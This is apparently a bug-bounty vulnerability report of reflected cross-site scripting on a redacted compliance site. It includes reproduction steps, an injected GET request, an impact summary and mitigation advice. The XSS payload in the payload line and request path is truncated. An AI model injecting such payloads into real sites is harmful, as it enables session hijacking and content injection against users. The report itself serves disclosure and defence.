Reflected Cross Site Scripting
URL:
Description:
Payload:
%f6<img%20src%3dx%
Steps To Reproduce:
1. Goto this URL.
http://compliance.redacted.
2.Intercept the request and insert XSS Payload after URL.
REQUEST :
GET /app/upgrade//yy%f6<img%20src%
Host: compliance.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
3. XSS Executed.
POC:
Impact:
Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.
Mitigation:
Developers should implement robust input validation and output encoding consistently across the application to defend against XSS and other input validation attacks. All of this input \ output mechanism recommended to implement: encoding \ escaping \ ‘black list’ \ filtering all special characters, e.g.: <, >, ‘, “, etc